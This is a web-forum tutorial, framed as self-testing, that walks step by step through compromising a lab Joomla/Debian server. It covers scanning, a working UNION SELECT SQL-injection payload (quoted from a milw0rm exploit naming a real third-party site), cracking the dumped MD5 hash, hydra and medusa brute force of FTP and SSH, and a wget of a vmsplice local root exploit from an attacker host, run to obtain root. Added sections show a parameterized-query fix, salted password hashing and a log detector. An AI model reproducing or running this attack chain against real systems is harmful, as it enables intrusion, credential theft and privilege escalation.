# Tutorials and Howtos # » [TUTO] Testing the security of your website and web server, by s3th

Author: badfusion (Admin), 15 messages, registered 18/05/2009
Posted: Wed 20 May, 2:42

We will start by using a few tools to gather information about the server.

- httprint
- dmitry http://wiki.backtrack-fr.net/index.php/DMitry
- nmap http://wiki.backtrack-fr.net/index.php/Nmap
- amap http://wiki.backtrack-fr.net/index.php/Amap

Code:

bt linux # httprint -h 192.168.1.44 -s signatures.txt
httprint v0.301 (beta) - web server fingerprinting tool
(c) 2003-2005 net-square solutions pvt. ltd. - see readme.txt
http://net-square.com/httprint/
httprint@net-square.com

Finger Printing on http://192.168.1.44:80/
Finger Printing Completed on http://192.168.1.44:80/
--------------------------------------------------
Host: 192.168.1.44
Derived Signature:
Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
811C9DC568D17AAE811C9DC5811C9DC5811C9DC5505FCFE84276E4BB630A04DB
0D7645B5811C9DC5811C9DC5CD37187C811C9DC5811C9DC5811C9DC5811C9DC5
68D17AAE68D17AAE68D17AAE811C9DC5E2CE6927050C5D3368D17AAE9E431BC8
6ED3C29568D17AAE2A200B4C68D17AAE68D17AAE68D17AAE68D17AAEE2CE6923
E2CE692368D17AAE811C9DC5E2CE6927E2CE6923

Banner Reported: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
Banner Deduced: Lotus-Domino/6.x
Score: 92
Confidence: 55.42
------------------------

Code:

bt ~ # dmitry -p -b 192.168.1.44
Deepmagic Information Gathering Tool
"There be some deep magic going on"

HostIP:192.168.1.44
HostName:joomla12

Gathered TCP Port information for 192.168.1.44
---------------------------------

Port State
21/tcp open
>> 220 Welc0m3 To The SUp3r S3cuRe's Ftp S3rVer
22/tcp open
>> SSH-2.0-OpenSSH_4.3p2 Debian-9
80/tcp open
.....

Code:

bt bin # amap -bvq 192.168.1.44 80
Using trigger file /usr/local/etc/appdefs.trig ... loaded 30 triggers
Using response file /usr/local/etc/appdefs.resp ... loaded 346 responses
Using trigger file /usr/local/etc/appdefs.rpc ... loaded 450 triggers

amap v5.2 (www.thc.org/thc-amap) started at 2008-09-15 17:35:02 - MAPPING mode

Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...
Protocol on 192.168.1.44:80/tcp (by trigger http) matches http - banner: HTTP/1.1 302 Found\r\nDate Mon, 15 Sep 2008 172821 GMT\r\nServer Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8\r\nLocation http//127.0.1.1/apache2-default/\r\nContent-Length 368\r\nConnection close\r\n
....
amap v5.2 finished at 2008-09-15 17:35:11

Code:

bt ~ # nmap -sSV -P0 192.168.1.44

Starting Nmap 4.50 ( http://insecure.org ) at 2008-09-15 17:44 CEST
Interesting ports on joomla12 (192.168.1.44):
Not shown: 1706 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd or WU-FTPD
22/tcp open ssh OpenSSH 4.3p2 Debian 9 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8)
111/tcp open rpcbind 2 (rpc #100000)
113/tcp open ident OpenBSD identd
MAC Address: 00:02:A5:23:CE:94 (Compaq Computer)
Service Info: OSs: Linux, OpenBSD

Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.378 seconds

This information gathering tells us we are dealing with an Apache 2.2.3 web server on a Debian etch machine, with an FTP service (vsftpd or WU-FTPD) and an OpenSSH SSH service.

We will now test the website running on this machine with nikto.

- nikto http://wiki.backtrack-fr.net/index.php/Nikto

Code:

bt nikto # ./nikto.pl -e 1 -host http://192.168.1.44/joomla12 -F txt -o nickojoom.txt
---------------------------------------------------------------------------
- Nikto 2.01/2.01 - cirt.net
+ Target IP: 192.168.1.44
+ Target Hostname: joomla12
+ Target Port: 80
+ Using IDS Evasion: Random URI encoding (non-UTF8)
+ Start Time: 2008-09-16 10:26:17
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
+ No CGI Directories found (use '-C all' to force check all possible dirs)
- Root page / redirects to: http://joomla12/apache2-default/
- Retrieved X-Powered-By header: PHP/5.2.0-8+etch10
+ /robots.txt - contains 13 'disallow' entries which should be manually viewed (added to mutation file lists) (GET).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
+ PHP/5.2.0-8+etch10 appears to be outdated (current is at least 5.2.4)
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.6). Apache 1.3.39 and 2.0.61 are also current.
+ mod_python/3.2.10 appears to be outdated (current is at least 3.3.1)
+ PHP/5.2.0-8+etch10 appears to be outdated (current is at least 5.2.4)
+ mod_perl/2.0.2 appears to be outdated (current is at least 5.8.0)
+ OSVDB-0: GET /joomla12/help/ : Help directory should not be accessible
+ OSVDB-0: GET /joomla12/index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.
+ OSVDB-8193: GET /joomla12/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc : EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-12184: GET /joomla12/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 : PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3092: GET /joomla12/administrator/ : This might be interesting...
+ OSVDB-3092: GET /joomla12/includes/ : This might be interesting...
+ OSVDB-3093: GET /joomla12/index.php?base=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?IDAdmin=test : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?pymembs=admin : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?SqlQuery=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?tampon=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?topic=<script>alert(document
+ OSVDB-3761: GET /joomla12/?pattern=/etc/*&sort=name : The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.
+ 2963 items checked: 22 item(s) reported on remote host
+ End Time: 2008-09-16 10:27:08 (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The report tells us there may be vulnerabilities. It is up to us to test and confirm them.

Code:

+ OSVDB-0: GET /joomla12/index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.

We will start with this one; browsing the site reveals the name of the Joomla component, which is MyAlbum
(hxxp://192.168.1.44/joomla12/index.php?option=com_myalbum&Itemid=26)

A quick search on milw0rm will find an exploit, if one exists.

Code:

bt Desktop # ./milwormsearch.sh Joomla myalbum
************************************************
* Explorateur d'exploit sur Milw0rm *
* by s3th *
************************************************

exploit: Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability
Link : http://www.milw0rm.com/exploits/5318
Voulez-vous afficher l'exploit dans firefox (F) ou à l'écran (E) ou quitter (Q) :
e
<html><head><title>Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability</title></head><pre>-------------------------------------------------------------------------------------------------
# Title : Joomla Component MyAlbum SQL Injection Vulnerability
# Author : parad0x
# D.Page : http://joomlacode.org/gf/project/myalbum/
-------------------------------------------------------------------------------------------------
http://[target]/index.php?option=com_myalbum&amp;album=[SQL]

-------------------------------------------------------------------------------------------------
Example:

http://www.akparti.org.tr/disiliskiler/index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*


-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------
http://inso.host.sk

# milw0rm.com [2008-03-28]</pre></html>

We will now test this injection on our site: -1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*

Code:

http://192.168.1.44/joomla12/index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*

and discover the admin password, which is an MD5 hash:

admin e10adc3949ba59abbe56e057f20f883e
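What makes the album parameter exploitable is that it is pasted into the SQL text. The following is an added example (not code from the post or from the MyAlbum component) showing a vulnerable query beside its parameterized fix, using SQLite in memory with constructed lab tables; the post's MySQL concat(...) is written with SQLite's || operator and the trailing /* comment marker is omitted because nothing follows the value in this simplified query.

```python
import sqlite3

# Constructed lab data: a gallery table with the same 5-column shape the
# union payload relies on, plus a Joomla-style jos_users table.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE jos_myalbum (id INTEGER, title TEXT, owner INTEGER,
                                  photos INTEGER, published INTEGER);
        CREATE TABLE jos_users (username TEXT, password TEXT);
        INSERT INTO jos_myalbum VALUES (26, 'Holidays', 62, 12, 1);
        INSERT INTO jos_users VALUES ('admin', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return db

def album_vulnerable(db, album):
    # String concatenation: the 'album' parameter becomes part of the SQL text,
    # so a UNION in the value appends a second SELECT to the query.
    sql = "SELECT id, title, owner, photos, published FROM jos_myalbum WHERE id = " + album
    return db.execute(sql).fetchall()

def album_fixed(db, album):
    # Validate the type first, then bind the value: it can never alter the query.
    if not album.lstrip("-").isdigit():
        raise ValueError("album must be an integer id")
    sql = "SELECT id, title, owner, photos, published FROM jos_myalbum WHERE id = ?"
    return db.execute(sql, (int(album),)).fetchall()

# The post's payload adapted to SQLite syntax (|| instead of concat).
PAYLOAD = "-1 union select 0, username || char(32) || password, 2, 3, 4 from jos_users"

def demo():
    """Return (rows leaked by the vulnerable query, whether the fixed query refused it)."""
    db = make_db()
    leaked = album_vulnerable(db, PAYLOAD)
    try:
        album_fixed(db, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked
```
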

Now we will see why it is important to choose a good password: if it is too weak it will be cracked by a tool like John the Ripper, or it will already be present in an online cracking database.

- johntheripper http://wiki.backtrack-fr.net/index.php/John_The_Ripper

Code:

bt Desktop # ./md5crack.sh e10adc3949ba59abbe56e057f20f883e
************************************************
* MD5crack online *
* by s3th *
************************************************

Plain text: 123456
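The hash above is reversed instantly because it is an unsalted MD5 of a very common word. This added example (not code from the post) reproduces that lookup against a small constructed wordlist, then shows the storage scheme a defender wants instead: a random per-user salt with an iterated PBKDF2 hash, plus a minimal policy check. Wordlist, iteration count and policy threshold are assumptions.

```python
import hashlib
import hmac
import os

# Constructed mini wordlist standing in for the dictionaries and online
# MD5 databases the post mentions.
WORDLIST = ["password", "qwerty", "123456", "letmein"]

def md5_lookup(digest_hex):
    # Unsalted MD5 of a common word is matched with one hash per candidate;
    # an online database simply precomputes this for millions of words.
    for word in WORDLIST:
        if hashlib.md5(word.encode()).hexdigest() == digest_hex:
            return word
    return None

def hash_password(password, salt=None, iterations=200_000):
    # Salted, iterated hashing: each user gets a random salt, so precomputed
    # tables are useless and each guess costs 200k rounds instead of one.
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def verify_password(password, stored):
    _, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    # Constant-time comparison avoids leaking how many bytes matched.
    return hmac.compare_digest(digest.hex(), digest_hex)

def is_acceptable(password):
    # Minimal policy (assumed thresholds): reject short or wordlist passwords.
    return len(password) >= 12 and password.lower() not in WORDLIST
```

Salting and iteration only slow down offline cracking of a dumped hash; they do nothing against the online guessing shown later with hydra and medusa, which is why the policy check matters as much as the hash format.
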

Now that we can log in as admin on the site, all that remains is to upload a script that lets us run shell commands, or a backdoor, and look for interesting information on the server.

cat /etc/passwd

Code:

s3th:x:1000:1000:s3th,,,:/home/s3th:/bin/bash
mysql:x:109:114:MySQL Server,,,:/var/lib/mysql:/bin/false
ftp:x:110:65534::/home/ftp:/bin/false
ftpuser:x:1001:1001::/home/ftpuser:/bin/bash
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
snort:x:112:115:Snort IDS:/var/log/snort:/bin/false

uname -a

Code:

Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux

Now that we have a user "s3th", we can attack the FTP or SSH service with:

- hydra http://wiki.backtrack-fr.net/index.php/Hydra/Hydra-gtk
- medusa

Code:

bt Desktop # hydra -l s3th -P ../arbeit/dict 192.168.1.44 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2008-09-17 11:21:39
[DATA] 16 tasks, 1 servers, 30206 login tries (l:1/p:30206), ~1887 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.44 login: s3th password: 123456
[STATUS] attack finished for 192.168.1.44 (waiting for childs to finish)
[21][ftp] host: 192.168.1.44 login: s3th password: 123456
Hydra (http://www.thc.org) finished at 2008-09-17 11:21:46

Code:

bt Desktop # medusa -h 192.168.1.44 -u s3th -P ../arbeit/dict -M ssh
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.1.44 (1/1) User: s3th (1/1) Password: 1234 (1/30206)
ACCOUNT CHECK: [ssh] Host: 192.168.1.44 (1/1) User: s3th (1/1) Password: 123456 (2/30206)
ACCOUNT FOUND: [ssh] Host: 192.168.1.44 User: s3th Password: 123456 [SUCCESS]

Now that we have an SSH account and password, all that remains is to log in:
Code:

bt ~ # ssh s3th@192.168.1.44
s3th@192.168.1.44's password:
Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Mon Sep 15 11:28:45 2008

All that's left is to find a little exploit.

Code:

s3th@debian:~$ whoami
s3th
s3th@debian:~$ cd /tmp/
s3th@debian:/tmp$ wget 192.168.1.39/vmsplice-local-root-exploit.c
--13:21:50-- http://192.168.1.39/vmsplice-local-root-exploit.c
=> `vmsplice-local-root-exploit.c'
Connexion vers 192.168.1.39:80...connecté.
requête HTTP transmise, en attente de la réponse...200 OK
Longueur: 6'293 (6.1K) [text/x-c]

100%[=============================================================================================>] 6'293 --.--K/s

13:22:42 (198.77 KB/s) - « vmsplice-local-root-exploit.c » sauvegardé [6293/6293]

s3th@debian:/tmp$ gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c
s3th@debian:/tmp$ ./vmsplice-local-root-exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e32000 .. 0xb7e64000
[+] root
root@debian:/tmp# whoami
root

This tutorial is only meant to show that a badly configured system is vulnerable.
Do not try these techniques on machines you do not own.
Everything you do will be logged on the machine.


Example log:

Code:

192.168.1.39 - - [15/Sep/2008:11:55:30 +0200] "GET /joomla12/MAINTAINERS.txt HTTP/1.0" 404 372 "-" "Mozilla/4.75 (Nikto/2.01 )"
192.168.1.39 - - [15/Sep/2008:11:55:30 +0200] "GET /joomla12/sites/default/settings.php HTTP/1.0" 404 383 "-" "Mozilla/4.75 (Nikto/2.01 )"/joomla12/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../etc HTTP/1.1" 200 21393 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
192.168.1.39 - - [15/Sep/2008:11:58:07 +0200] "GET /joomla12/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc HTTP/1.1" 200 21460 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"

[**] [119:2:1] (http_inspect) DOUBLE DECODING ATTACK [**]
09/15-11:50:04.553916 192.168.1.39:34912 -> 192.168.1.44:80
TCP TTL:64 TOS:0x8 ID:60741 IpLen:20 DgmLen:264 DF
***AP*** Seq: 0x9F333580 Ack: 0x91AAD632 Win: 0x2E TcpLen: 32
TCP Options (3) => NOP NOP TS: 776253 295742092

[**] [1:1560:6] WEB-MISC /doc/ access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2]
09/15-11:50:05.345233 192.168.1.39:35061 -> 192.168.1.44:80
TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:207
***AP*** Seq: 0x9F2992AC Ack: 0x919D463E Win: 0x38 TcpLen: 20
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0678][Xref => http://www.securityfocus.com/bid/318]
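Every step of this walkthrough left a trace in the Apache access log. This added example (not code from the post) parses combined-format log lines and flags the three patterns seen above: the Nikto user agent, the ../ traversal in the ew_filemanager request, and the UNION SELECT in the MyAlbum query. Two sample lines are copied from the post's log; the other two are constructed, as is the threshold for noisy sources.

```python
import re
from collections import Counter
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Lines 1 and 2 come from the post's log; lines 3 and 4 are constructed.
SAMPLE_LOG = """\
192.168.1.39 - - [15/Sep/2008:11:55:30 +0200] "GET /joomla12/MAINTAINERS.txt HTTP/1.0" 404 372 "-" "Mozilla/4.75 (Nikto/2.01 )"
192.168.1.39 - - [15/Sep/2008:11:58:07 +0200] "GET /joomla12/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc HTTP/1.1" 200 21460 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
192.168.1.39 - - [15/Sep/2008:12:03:11 +0200] "GET /joomla12/index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/* HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
192.168.1.20 - - [15/Sep/2008:12:05:42 +0200] "GET /joomla12/index.php?option=com_myalbum&album=26 HTTP/1.1" 200 8123 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/2.0.0.11"
"""

# Each rule sees the parsed record; the path is URL-decoded first so %20 and
# '+' encodings of the payload do not hide it.
RULES = [
    ("scanner user-agent", lambda r: "nikto" in r["ua"].lower()),
    ("path traversal", lambda r: "../" in unquote(r["path"])),
    ("sql injection", lambda r: re.search(r"union\s+select|concat\(",
                                         unquote(r["path"]).replace("+", " "), re.I)),
]

def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect(log_text):
    """Return a list of (ip, rule name, path) hits over an Apache combined log."""
    hits = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue  # skip lines that are not combined-format entries
        for name, check in RULES:
            if check(rec):
                hits.append((rec["ip"], name, rec["path"]))
    return hits

def noisy_sources(log_text, threshold=2):
    """IPs with at least `threshold` flagged requests: candidates for blocking or review."""
    counts = Counter(ip for ip, _, _ in detect(log_text))
    return {ip for ip, n in counts.items() if n >= threshold}
```
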